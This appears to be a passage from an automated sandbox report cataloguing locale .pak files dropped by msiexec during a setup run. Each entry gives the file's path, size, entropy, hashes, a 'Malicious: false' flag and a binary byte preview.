Entropy (8bit):	5.519796392618245
Encrypted:	false
SSDEEP:	3072:3byA6gCM6By7Nv7vr7hA8aBV08Iouo+wvxr0Xcp/AikOSAqb+HicHE0uP1P4NUFn:Ahwxfh+cwJPwd75or76l/4c
MD5:	AF7AEC4B45EAD620463B732E16F63E47
SHA1:	E6838C56B945C936FDB87389FDC80CDF7BC73872
SHA-256:	BFEEAFE2F8A9F797D20C4209181C4768FBEA4A61FF2DC1F57F6CD18BC872FC13
SHA-512:	784FF8DC6011883E931B4B8371E5ADA960120931BFDF24F81648F5092FA31DB1D03E5D3CF5CD16D57EA7FB7877BB25A28533085AB42BFE40DC25CA7D9CEE7ADE
Malicious:	false
Preview:	.........#T.e.\...h.d...i.u...j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}.0.....8.....=.....E.....M.....U.....\.....c.....j.....k.....l.....n.....z.......................E...........3.....T........... .....X.....m...........d.................?.......................S.......................G.......................F...................................K.....m...........9.....}.................Y.....................................................s.................D.....k.......................@.....Q.............................u.................#.....y.......................x.................'.....y.......................].......................m...........-.....H.......................'.............................c.......................w.................P................. .....6.................5.....N.........../.................'...................................:.....^...........!.....P.....a.........................................H.

C:\Users\user\AppData\Local\Programs\Setup\locales\hu.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	551843
Entropy (8bit):	5.644800761543747
Encrypted:	false
SSDEEP:	6144:0sTpI7ceE8WnOL42HPs2P0Ar7ky1XB5VwFZfpadYGDuU1gGse33a5gRFxztGateg:0spI7Y8WQ+AXB5VwAtj/3a5t+D
MD5:	B93BEEB1E35A29B310500FA59983F751
SHA1:	45C0B2CAB4C4A820CFC2AED4B7236DDC79A0DB00
SHA-256:	BAB09C3CB80130A4A288642633C2B31AB08B1757466D9A468BC36D276079F002
SHA-512:	249DE5B8BD7C4755CAA8B9552254D353B0D885B63BD5F7C6C8E29B3F4E447C9E8D6C0E88D5AABA0B898AA26880592B3904E19CA4797A2AC1DD757AAEE782C37C
Malicious:	false
Preview:	........E#..e.....h.....i.....j.....k.....l.%...n.-...o.2...p.?...q.E...r.Q...s.b...t.k...v.....w.....y.....z.....\|.....}...............................................................................!.....6.....J.......................7.................v...............................................8.....Q...........+.....R.....c...........9.....r.........................................).........................................K...................................`.....z.........................................:.....W.........../.....V.....n...........F.....q...............................................U.....k...........v.................-...................................X.....l.............................M.......................t.................)................./.....G...........C................./.......................%.....~.................R.................(...........V.................\|...........L...................................b...................................Q.

C:\Users\user\AppData\Local\Programs\Setup\locales\id.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	454027
Entropy (8bit):	5.384059218448116
Encrypted:	false
SSDEEP:	6144:f91C6s7szabK6s1o8Jf+eVnjHF26miZ0FZ58VhrwkK5R3SzP7IEji40Hf:fu7Bu6F85VnjHFXmM0b58VhAf
MD5:	BC719B483F20E9A0B4B88969941C869D
SHA1:	4D926A9ABA7C350E9DA8AA570A9F52534C81AA88
SHA-256:	F175E58BE47B228803AA32D2695E2FCFAF4655B65B96FB6B539B3E59593E6799
SHA-512:	DDF6108888676C1A90865DAAA88198B681B685D9047B0E10F5AA08DAA39A628A84732A8518606176529297BEC51CE8BC39E910EEFFC8B88E9585FAFB694C35DB
Malicious:	false
Preview:	........[#x.e.....h.....i.-...j.9...k.H...l.S...n.[...o.`...p.m...q.s...r.....s.....t.....v.....w.....y.....z.....\|.....}.................................................".....#.....$.....&.....4.....A.....Q.....c...........I.......................J.....w.................J.......................d......................._.......................0.....Q.....h...........'.....V.....z...........2.....d.....{.................H.....U......................7.................8.....K...........&.....k............................./.....{.......................A.............................m.......................R............................V.....`.................0.....<.......................).......................%.....m.......................(.....h.......................F.....q.................*.....[.....}.......................)...............................................)...........!.....z.................S.......................Z.......................!.....@.....P.................F.

C:\Users\user\AppData\Local\Programs\Setup\locales\it.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	501266
Entropy (8bit):	5.293951985847116
Encrypted:	false
SSDEEP:	6144:ZckXLmyax92+fMiMNDYISIqRRRsO1StBWRT9Tjex6qipELqbPpzHi9fLwsQ2nbwb:iWmhH6mZD28HG4KUw05klot
MD5:	AB160B6E8BBABA8F8BDE7E2D996F4F2E
SHA1:	EB7EAE28A693337B8504E3E6363087B3B113BC72
SHA-256:	E86BA661B3F6F7ECD2312FE90B873330C0D6516A5501A0F326875844E8D4B289
SHA-512:	14E8919E2F5A7AD2B3F310FFEC590B221E6E0DC45F37EFC57FF9B8FF7A3CA674D6F4B9BD65E49A98AF6726FA953F2168E5C8E6101ED977E8C7FF4A51203F8D4D
Malicious:	false
Preview:	........a#r.e. ...h.(...i.9...j.E...k.T...l._...n.g...o.l...p.y...q.....r.....s.....t.....v.....w.....y.....z.....\|.....}..................................... .....'.........../.....0.....2.....E.....T.....m.....~.........................................&.....7.........../.................?.......................l.......................;.......................>...................................S.....x...........G.......................^.................".......................l...........3.....Q.................+.....I.............................e.......................H.......................P.......................0.....~.......................R............................._.....j...........Q.......................[.............................,.....B.......................1.................T.................2.....X.....m.................3.....F...........+.....~...........3...........#.....:...........4.................+.......................F.......................(.............

C:\Users\user\AppData\Local\Programs\Setup\locales\ja.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	613077
Entropy (8bit):	5.6866751137991765
Encrypted:	false
SSDEEP:	6144:a1AxTSuPJmsKRC/uGsDKNJL+iCrtZKQ2xM6bU5B7YxVD:a2xYsKRC2GsDa9StZKQ2xM75B7m
MD5:	DEE9626A8D7CACC7E29CFF65A6F4D9C3
SHA1:	5C960312F873AB7002ED1CCE4AFDB5E36621A3CE
SHA-256:	63AD3974BAA8C160BA30448171F148D008AC19E80010FB13D3A65CF411B67AE0
SHA-512:	EE80D58886F4AC378D6491E075062C171A715AF7C42DD1785952B25A572381ACD722764E8BE914ADBFCCF2A5FA4A51968B989B632EEFB9D636851F1B8FFB82E1
Malicious:	false
Preview:	........."'.e.....h.....i.....j.....k.....l.....m.....o.....p.....q.....v.(...w.5...y.;...z.J...\|.P...}.b.....j.....o.....w...................................................................................;...........a.................P.............................G.................{.....&.................;.......................\...................................3.....X...........g.................?......................._.......................}...........%.....4...........{.................b...................................>.....Y...........l.................{...........g...................................j...........*.....<...........'.....c.....r...........}.............................o...................................a...................................\.....z.............................q...................................<.....W...........,.....f.....\|.....$...........,.....A...........Z.................b...........!.....B...........0.....i...............................

C:\Users\user\AppData\Local\Programs\Setup\locales\kn.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1231605
Entropy (8bit):	4.220671500631487
Encrypted:	false
SSDEEP:	12288:UNHCRmR6fkA6GjYQnbY25l67c5qBUic+E+htyR:UNiRmR6Lr5mUJ
MD5:	32E5F528C6CEE9DE5B76957735AE3563
SHA1:	74A86191762739D7184B08D27F716CFA30823A98
SHA-256:	CD297F7E872B34E63CA2D98DC2FA79085E8A2985BA8757601E4B901A3F30B013
SHA-512:	92D100B1289E63FD0DC65657FB4B1E16F298735E6CD066E9122D04E3B79E0D286F15FC9F1DA2C3A05AF528B92BDE95FCFBC493C466DB2D94A0749ADFBF7FB8D5
Malicious:	false
Preview:	.........#O.e.f...h.n...i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z."...\|.(...}.:.....B.....G.....O.....W....._.....f.....m.....t.....u.....v.....{.................).....u...........(.....)...................................@.....Z.....4.................T...........1.........................................E.....t...........i...........\.........................................r.......................-.....j.............................V...........q...........x...........G.....y.....8.................0...........s...................................;.................D.....f...... ..... ....>!....m!....B"....."....s#.....#....i$.... %.....%.....%.....&.....'.....(.....(.....)....j.........)+.....+....L,.....,.....,.....-....+..................0.....0....v1.....1.....2....y3.....3....(4....X5....$6.....6.....7....X8.....9.....9..../:.....;.....=.....>....I>.....?.....@....\|A.....A.....C.....D.....D.....E.....E.....F.....F...."G....UH....>I.....I

C:\Users\user\AppData\Local\Programs\Setup\locales\ko.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	517250
Entropy (8bit):	6.059093259094021
Encrypted:	false
SSDEEP:	12288:Bv+8Jr3zNRTuTjXcq+t8OQ4EVh3IKACqX5K7GGZ+8BtPq7hUomrOedlO:x+8BWm5H86alO
MD5:	38A95D783D627E9A83AD636FAA33C518
SHA1:	CB57E8E9EF30EB2B0E47453D5EC4F29CEA872710
SHA-256:	0D9B23E2981412D11ECEA3ADE8D521A073802D9431C39D72B88F62B98E50A96B
SHA-512:	4119B8F82107473C941C9E10B6BAE97D60C9C47570CC2B40F429A95F4F5CCA77EECBACD7023AF439429026F6E55AD9DF19998C8B98BE0D04D384B310D025C0DC
Malicious:	false
Preview:	........."A.e.....h.....i.....j.....k.....l.....m.....o.....p.....q.....r.....s.....t.....y.....z. ...\|.&...}.8.....@.....E.....M.....X.....`.....o.....t.....{...............................................K.................#.................=.....P...........4.....z.................^.......................r.......................v.................).......................:.......................S.......................G.......................F.......................\|...........?.....V.................,.....C.............................v.......................v.................7................./.....?.................:.....M.................9.....I.................8.....H...........=.......................H.....i.................C.....k.................N.....t.................z.................8.....u.......................V.......................J.....}...................................[.......................\|.......................q.......................f.......................}.

C:\Users\user\AppData\Local\Programs\Setup\locales\lt.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	556374
Entropy (8bit):	5.6329747097065646
Encrypted:	false
SSDEEP:	12288:ciW9XReMAg80mI963AS56ziarWCB56SNU:xAAMVL7S5Xa6CBW
MD5:	3E9119A712530A825BCA226EC54DBA45
SHA1:	10F1B6BF2FA3A1B5AF894D51B4EB47296C0DBC36
SHA-256:	3DA531A9A5870315823E74B23031CB81379D2D94AE9894A7FB1D8A8AD51A2DA9
SHA-512:	765C872CAFA1B266575B0CAC09DFA796CDB860BD82E1C657397FE2AADA11771F306B0A1776E4D66FF41E94B153C812592430F31E7B1FF97ABE7D8E6B96D321F1
Malicious:	false
Preview:	........j#i.e.2...h.:...i.K...j.W...k.f...l.q...n.y...o.~...p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}.........................#.....+.....2.....9.....@.....A.....B.....D.....R....._.....s.............................#...........9.................3.................'.................V.....p...........i.................'.......................z...........(.....M...........`.................8.......................m...........!.....1...........I.................:.................6.................?.....Z...........=.....m.................k.................+.......................p...........*.....9...........7.....r...................................9.............................(.....{...................................Z.................?...........1.....g...................................o.............................4.....v...........'.............................W.................J.................,...........^.......................u...............................

C:\Users\user\AppData\Local\Programs\Setup\locales\lv.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	553985
Entropy (8bit):	5.628621633625195
Encrypted:	false
SSDEEP:	6144:E4wNRkfYqooJw9bJ28DZyJxyNGtVF2tPlz7c4YbUSZbb3n5nygN9E9J5gosRyEAS:Okxw5P8iplzw4XkXn5vE350ypO19
MD5:	E75CDDA386DD3131E4CFFB13883CDA5F
SHA1:	20E084CB324E03FD0540FFF493B7ECC5624087E9
SHA-256:	AE782F1E53201079CA555BAA5EC04B163188E5161242D185F04A606A49FC8C0D
SHA-512:	D27BC61028031946ED6708918F921C3D681C8962B8D5507A91AB6576E3B2C462524E550305DB87EDE886E41FB0E49EDEC2D84CDBBAD675282105627E01D98BF5
Malicious:	false
Preview:	.........#C.e.~...h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.%...y.+...z.:...\|.@...}.R.....Z....._.....g.....o.....w.....~.................................................................D.................1.............................D.................0................. .....{...........;.....F...........;.....s.................u.................f...........^...................................A.............................>.................,...........".....C.................4.....J.................@.....R...........%.....L.....`...........q.................1.......................\.................(.................D.....U...........M.................*.................5.......................(...........'.....^.....~...........M.....r...................................{................."...........&.....[.....t...........r.................l.....$.................".......................v...........8.....H.................5.....W...........n.......

C:\Users\user\AppData\Local\Programs\Setup\locales\ml.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1281970
Entropy (8bit):	4.255584378467937
Encrypted:	false
SSDEEP:	12288:+okD5/VA2cMmsbbAxqInxblD/xn9mMRTAr6DuhQA+tHxy3ewh+5qR7dCds/fv38C:aPzqzXry3e75qR7qs/X3X
MD5:	6E96EDDFE80DA6AAA87F677FEEF4D1D6
SHA1:	8A998785D56BC32B15CEE97B172CD2DCDC8508D9
SHA-256:	E2FB73353AB05EB78F9845BDBDF50B64C9FB776B7F08948F976FE64E683397C4
SHA-512:	FEEA11DFC6EC153AB903B5828306617EEDEEE19DAA73BD046AE47757795FECB9ABCE6192BB3A9561AAACE7FC85EE442057B93081C6C986855B819FD38815E6F7
Malicious:	false
Preview:	.........#M.e.j...h.r...i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.&...\|.,...}.>.....F.....K.....S.....[.....c.....j.....q.....x.....y.....z.......................<.................2...........e................./.....{...........J.....9.......................U...........v.....F.............................a.................[...........!.....o...........E.......................D.............................Q.................\...........6.....~.....u.................B.......................T.......................n...................................b.....F ..... ....]!.....!....u"....F#.....#.....#.....$.....%..../&....l&....;'.....(....q(.....(.....).....*.....+.....+.....,....}-.....-....1............/...../....,0.....1.....1....n2.....2.....3.....4....p5.....5.....6.....7.....7....28....T9....K:.....:....,;....k<....-=.....=....+>....Y?.....@....QA....zA.....B.....C....tD.....D.....F.....G.....G.....G.....H.....I....=J....wJ.....K.....L.....M

C:\Users\user\AppData\Local\Programs\Setup\locales\mr.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1052914
Entropy (8bit):	4.286050307210063
Encrypted:	false
SSDEEP:	3072:3P5UK/LY0rHXWjViQm0vLJuVXrMHwrNf3FaMUCyGR93RkR3bntOubz1hzudmHwfZ:xUCY8qA0pJvC3SGINa5/pC7t2
MD5:	FDA40999C6A1B435A1490F5EDCA57CCD
SHA1:	41103B2182281DF2E7C04A3FFF23EC6A416D6AA9
SHA-256:	0EBB125A0BDFD1E21B79914CA8E279790D41F7BAC35BF2D031DD7981F1C1C056
SHA-512:	666CEB24D2E568A00A77512295E224A6545BF6ABCFA19C93AA823DB5330117FCB39FDE570E7601DBD41976950C3EC03634F89FC5D9203357515E6651AB0B6D32
Malicious:	false
Preview:	........<#..e.....h.....i.....j.....k.....l.....n.&...o.+...p.8...q.>...r.J...s.[...t.d...v.y...w.....y.....z.....\|.....}...............................................................................8.....W.................3...........-.....j........... .....a...........................................................f.........................................&...........u...........>.....u.....E.......................V.......................9.....t.................\|...........(.....b.....5...........q.....?.......................Z.................r..... .....a...........y.....V.............................%.....Q...... ..... ....9!....\!....."....."....5#....U#....($.....$....O%....u%.....&.....'.....(.....(.....)....X..........*....i+.....,....B,....d,....0-.....-....o............/.....0....W1.....1.....2....\|3.....3.....4....K5....D6.....6.....7....^8....%9.....9.....:....e;.....<.....=.....=....#?....-@.....@....;A....DB...."C.....C.....C.....D....cE.....E.....E.....G.....G.....H

C:\Users\user\AppData\Local\Programs\Setup\locales\ms.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	476479
Entropy (8bit):	5.251439262040867
Encrypted:	false
SSDEEP:	6144:B304QirwGezQZU+JsxJwCuRlO0jlsUcSP5slGKsMSYlEFh:O49UzKU9xJqlOulj5VhMM
MD5:	73096184D7BD6A9A2A27202D30A3CFA1
SHA1:	EA711B29787AA8B9E9AF6BDE5B74103429E5855F
SHA-256:	D1072514BAB63AF5DFBF923175D491787139F0C1B6361ACB23E67543836C84BA
SHA-512:	E3FBEE4896554E502C222B5FFE38E9D61E9DB4D18CDC92CE5118B819DC60789BFD6D6C7F8444FF1763222455AB91E79BFE500E75C0E06B0DE70C2C64FB043C6F
Malicious:	false
Preview:	.........#A.e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w. ...y.&...z.5...\|.;...}.M.....U.....Z.....b.....j.....r.....y...........................................................q...........C....._.................R.....b...........@.......................n.................!.....u.......................i.......................n.................=.......................^.......................;.......................).......................F.................%.....m.......................2.............................\.......................V.......................^.......................T.......................B.....r.....{...........5.....h.....s...........V.......................W.....\|.................7.....[.....u.................C.....T.................8.....[.............................p........................................./...........&.....z.................W.......................d.......................4.....V.....f.................A.

C:\Users\user\AppData\Local\Programs\Setup\locales\nb.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	463564
Entropy (8bit):	5.426692701465118
Encrypted:	false
SSDEEP:	12288:8ba9K5cV3MpYuwOp7fdBia+c5Io42gz4vj:oa3D/a+c5z4hzE
MD5:	28CC86C7204B14D080F661A388E7F2C0
SHA1:	E0927EA3C4FD6875DAFD7946AFFB74AD2DB400F5
SHA-256:	9253122D94CCEA904FB9363B8178CA9335B8380B7891F1A7A22AFB3113309E72
SHA-512:	E2524E10D145F95C028D65E47CF06FC82C7A43FCF0ECF01202278C7FB14079C03E9434E8039FD96AAEE870872C9896D9F0ED575E50C19A3781CB0C94FE59B3A5
Malicious:	false
Preview:	........r#a.e.B...h.J...i.a...j.m...k.\|...l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}.......$.....).....1.....9.....A.....H.....O.....V.....W.....X.....Z.....e.....t.................6...........).....>.................@.....S...........b.................3.......................4.......................".....~.................#.......................O.............................$.....q.................j.................:.............................9.......................D.....].....k.................>.....N.................!.....1.................0.....D.................2.....B.................<.....L.................(.....8.................$.....2.................a.....y...........*.....P.....c.................-.....F.......................'.................S.................>.....d.....}...........J.....v.................Q.......................}.................[...........!.....J.................>.....Q...........................................

C:\Users\user\AppData\Local\Programs\Setup\locales\nl.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	477660
Entropy (8bit):	5.368696736425329
Encrypted:	false
SSDEEP:	6144:uerc6TeVRbZy3gihngHh9gog5HHnpo+h459tmxDGpF97358OTn:uf6Teuagog5nx459tmxDGpF97WOTn
MD5:	7FC6AE561FD7C39FF8BA67F3DBAA6481
SHA1:	2E3977403A204C6F0CA9A6856BB1734490A57E72
SHA-256:	844031E1DE2B2872D12D5B7D42ADF633C9D4B48169B1B33B7492B3B060C73558
SHA-512:	90294AE24B7DB003BC34A48F98D9E1887E87C6F605DEFE01DDCF9187429E8446C04A7F94BB6AADC8E61C98842163BC3702B414393AB836EB0BEE038F09481C2B
Malicious:	false
Preview:	........X#{.e.....h.....i.'...j.3...k.B...l.M...n.U...o.Z...p.g...q.m...r.y...s.....t.....v.....w.....y.....z.....\|.....}................................................................... .....,.....<.....M....._...........i.................<.......................`...................................1.....H.......................+...............................................=.................L.....l...........*....._.....n...........9.....p.................e.................@.......................k.......................=.............................b.......................a.......................Z.......................:.....d.....n.................E.....R.................B.....Q...........-.....m.................<.....i.................".....C.....Z.................8.....J.................S.................!.....?.....S.................I.....Z...........,.....o...................................\|...........).....N.................J....._.................&.....6.................&.

C:\Users\user\AppData\Local\Programs\Setup\locales\pl.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	534366
Entropy (8bit):	5.77011996675953
Encrypted:	false
SSDEEP:	12288:Hg1L9OZWoOB/oZU/FmXgvh6HA7b0mPeCUdVe3mbUbEmw1QhWRH5EdL4ftiJ:Al9OjtU01Qhc55y
MD5:	BA7A9ABA68211D8639DFFAE0EF8B88DA
SHA1:	A9A26B8F0902475CB576967CBE9013028CB21DA4
SHA-256:	60AA08598A81BB46DDC64A5AB0852565554C6E6262E9C5DFEE09F4E3FC08D5FE
SHA-512:	A1B8BFC3E19AA1267E31838E1C1F2B0B1CFCDF56F84E967088D626B58EC64B3305043A14B12FD080498EE1D74A4192453914C393CE8F848EA5616CF88ABC4EB5
Malicious:	false
Preview:	........x#[.e.N...h.V...i.g...j.q...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}. .....(.....-.....5.....=.....E.....L.....S.....Z.....[.....\.....^.....m.....{.................D...........?.....[...........).....c.....v.............................U.......................m.......................f.........................................C...........9.......................v.................,.......................X.................8...........I.................%.....b.....w.................1.....T.....d.......................&.................(.....<.................*.....<.................".....2.............................x...................................Q.....i................. .....7.......................'.......................,.................M.....~.................5.....L.................%.....A.................i.................v.................c.................>.................%.....6.....~.......................b.............

C:\Users\user\AppData\Local\Programs\Setup\locales\pt-BR.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	502496
Entropy (8bit):	5.42724876798731
Encrypted:	false
SSDEEP:	6144:OrUbPq56NTyytNBXBLilIyMyE15aKJutiOsRhkxCp:Or6C5FyT5hJKsRKxM
MD5:	53D5FB849C9BAB70878B3E01BFFAD65A
SHA1:	E72AF1A76539E66CEF4A4EEF5844B067A4E1A79F
SHA-256:	40DD24C5E225ED941BBAAB3DCFEFA993E39FBC75A1798F4F6E06424956698AC5
SHA-512:	55357643D789D2EED72E009F08F72BA4895BA455CA00C8347A3C3790E43F8D7E4625FEDA438ECAC840BDC52C26D2135D89BEA693B61A293922B6056BDE6B4516
Malicious:	false
Preview:	........t#_.e.F...h.N...i._...j.k...k.z...l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}.......".....'...../.....7.....?.....F.....M.....T.....U.....V.....[.....m.....}.................B...........*.....F.................F.....V...........s.................U.......................W.......................<.......................h.................H...........=.........................................=.......................k...........).....B...........N......................._.......................O.......................L.......................U.......................N.......................-.....[.....e.................5.....?.................4.....E...........@.......................H.....l.......................?.......................3...........,.....g.................5.....N.................N.....a...........1.....\|...............................................Y.................6.....^.....q.................4.....I...........!.....^.....~.......

C:\Users\user\AppData\Local\Programs\Setup\locales\pt-PT.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	503874
Entropy (8bit):	5.406123541333513
Encrypted:	false
SSDEEP:	6144:f3O/2bF2ozwfieJVJJxhoN4lCOfVY35NKimSRri:f+/2x2od35NKtSR2
MD5:	0237374730FA1A92DEC60C206D7DF283
SHA1:	62DBBD855D83EF982A15C647B5608DAFB748745A
SHA-256:	2FB2FD2E32B952DCBC8914F9D3AAF02BF2750B72ABFEE2E8B2BB08062DDD9934
SHA-512:	63EC4EC44002724E22703A3BD952D1FF4062B367C4F5E3F106349BD226AD1317BEF2E371FDA0E099EA5C0AFD32A9D2C1246C93C18D73DCCF8FC2C1644A6FB6B2
Malicious:	false
Preview:	.........#M.e.j...h.r...i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.&...\|.,...}.>.....F.....K.....S.....[.....c.....j.....q.....x.....y.....z...................................W...........<.....W...........".....m...............................................5.....Y.................&.....6.........................................L.....z...........Z.................*.......................I.......................f.................0...........&.......................R.......................@.....q.................C.......................S.......................T.......................7.....d.....n.................=.....G.................2.....C...........!.....q.................1.....[.....w.......................!.......................,.................R.......................E.....W.................;.....P................._.....y.............................r...........).....M...........0.....p.................$.....I.....^...........,.....h.

C:\Users\user\AppData\Local\Programs\Setup\locales\ro.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	522785
Entropy (8bit):	5.459461998642662
Encrypted:	false
SSDEEP:	6144:F5F0NqPzpwXg7XTLb/7FSmo/xOfinKdoGN5PBoC1s2e/m7O3:SI0g7XTL/FSmo5OqKdN5pop/53
MD5:	4E692489E2AE74A4A11CA0A113048F15
SHA1:	CB2B80217D5372242D656AC015C024FE1E5E77B7
SHA-256:	4A2A305668F1926CFE4BB72E8FBFDE747C83AC4DD9CF535C13AE642D0B96FB79
SHA-512:	8AD9E0A79137A862DEF24D6963536E75B87BB71AB74DBDD43531C5C95DDD3CD834F22C6A8E3A1E03AAD35ADE65ECD227D5101B5BE3CE3F0B7B471F5136CFD77C
Malicious:	false
Preview:	........j#i.e.2...h.:...i.K...j.U...k.d...l.o...n.w...o.\|...p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}.........................!.....).....0.....7.....>.....?.....@.....B.....Q.....].....k.....}.............................l...................................p.................x.................-............................._.......................}.................j.................>.................d.....}...........@.....t................._.................L.................J.......................$.....s.......................D.......................).......................&.....{.......................c.......................9....._.....o...........!.....P.....d...........\.......................c.......................3.....S.....w...........8.....g.....z...........k.................B.......................3.......................^...................................U.....n..........._.................B.......................F.......................H.............

C:\Users\user\AppData\Local\Programs\Setup\locales\ru.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	856355
Entropy (8bit):	4.826212670448168
Encrypted:	false
SSDEEP:	12288:2oZ3aknfQjRo4YS7yMh/KgNzJ9fx+aAka2qSGsN8zqcnYH8eXN2hPO3j/zpbzvMX:hZ3GR/5X6Eq
MD5:	1A9B38EC75CCFA3214BEF411A1AE0502
SHA1:	DE81AF03FFF427DFC5FFE548F27ED02ACAE3402D
SHA-256:	533F9E4AF2DCE2A6E049AC0EB6E2DBF0AFE4B6F635236520AEE2E4FA3176E995
SHA-512:	05CF20AEA71CDD077B0FA5F835812809AD22C3DBEBC69E38AB2C9A26AD694AB50D6985AEC61633B99713E7F57408C1C64CE2FB9CCDAC26661B7167853BDD6148
Malicious:	false
Preview:	........."..e.....h.....i.....j.....k.&...l.1...n.9...o.>...p.K...q.Q...r.]...s.n...t.w...v.....w.....y.....z.....\|.....}.........................................................................!.....>.....V.....}.....>.......................O...........Q.....r.....T.......................O.................N.......................(.......................5.........................................T...........G...........,.....a.....................................................!...................................*.....g...........Z.................,.......................w...........%.....J...........{.................{...........-.....D...........A.....z.................x.............................,.....V...........R.................!.....x.................I...........Q.....j.....^...........\...........I...................................T...........R...........:.....d.....7...........l ..... .....!....`"....."....9#.....#....b$.....$.....$....E%.....%.....%.....&.....&.....'.....(

C:\Users\user\AppData\Local\Programs\Setup\locales\sk.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	539514
Entropy (8bit):	5.818959197750725
Encrypted:	false
SSDEEP:	12288:zF2oXDdqsGk2Rspyzir+e/5CvHLg3HXLPxt9R:EoXDdqshpyk/5uLIltD
MD5:	F117E58E6EB53DA1DBFA4C04A798E96F
SHA1:	E98CEE0A94A9494C0CFC639BB9E42A4602C23236
SHA-256:	B46DB20EEBA11F8365296B54469FDD001579852DC1D49A01FC59D2A8BCF880A3
SHA-512:	DEA792A63E0557D9E868C0310EC2A68B713DAF5CF926389E05A0885CDB05433D20F35D087DE269F9584795DA50600966B8FF5DD95583861443A1E90564A89793
Malicious:	false
Preview:	........l#g.e.6...h.>...i.R...j.^...k.m...l.x...n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}..................."..........2.....9.....@.....G.....H.....I.....K....._.....g.....y...........>...........[.....v...........W.................1...................................).....@.................>.....Q.................3.....G........... .....U.....z.........................................6.....O...........2.....h.....y.............................n...........L.....g.................=.....R.................9.....K.................3.....E...........%.....c.....y...........V.......................b.........................................(.......................}...........N.....f.................!.....5...............................................-................o.................M.....i.....~...........\.................#.............................%................. .......................Y.......................V.......................i.............

C:\Users\user\AppData\Local\Programs\Setup\locales\sl.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	518515
Entropy (8bit):	5.490293083588063
Encrypted:	false
SSDEEP:	6144:Gbsq8+s/u07QLr32zTMSB29i2iM8nnbrNjSdum4ocyxPbPD+DTubVmavfDszt5T0:sLWroSB2T+E+p578c0JHjcGi/fzzCqc
MD5:	435A2A5214F9B56DFADD5A6267041BD3
SHA1:	36BBC7CA3D998BFB1EDC2FF8A3635553F96CA570
SHA-256:	341C33514C627501026C3E5B9620CF0D9F482AB66B10A7E0FB112C7620B15600
SHA-512:	55271935E18AC27C753431AF86A7DCD1F4A768ADEF1B593BA8E218DA34856A5F9FAF9819A3ECCE3F21F0607BA95100C5CB18CD1A7138EC563090D0391AD5B52D
Malicious:	false
Preview:	........X#{.e.....h.....i.'...j.1...k.@...l.K...n.S...o.X...p.e...q.k...r.w...s.....t.....v.....w.....y.....z.....\|.....}.........................................................................0.....>.....N.....a...........~.................Y...................................].....\|...........H.....\|.................G.....r.................:.....e.....t...........V................./.......................l.................).................4.....H...........B.....y...........3.................*.............................c.......................N.......................Z.......................}.................#.................J....._.................I.....\.................Q.....`...........;.....x.................G.....g.................,.....J.....e...........'.....k.....}...........^.................).....{.................".......................B.............................>.................y...........O.................c.......................J.....h.....x...........X.......

C:\Users\user\AppData\Local\Programs\Setup\locales\sr.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	799241
Entropy (8bit):	4.749887536690665
Encrypted:	false
SSDEEP:	12288:qCIVob4zA74dHLYbeHIdN4SGdEDWeUnLYA1785sXMx5xMd8G37gjemS/k/C:ZSe41A0x85nxQP
MD5:	8F58B2463E8240EF62E651685E1F17D8
SHA1:	6C9F302AED807A67F6B93BCB79577397A5AD3CF7
SHA-256:	5A55320D6953EFB5B565893E32E01F6DAE781A16460DF5502C8BA012C893EDFD
SHA-512:	6076D43A73D5FA5192CBE597E018B268CFDC7EFB94A6CB45DAD5B0DA9C3ABF68AAF2EA06F3AD650B28A993605917B6D356339D79F8DD6962D2C40DBF4653EF83
Malicious:	false
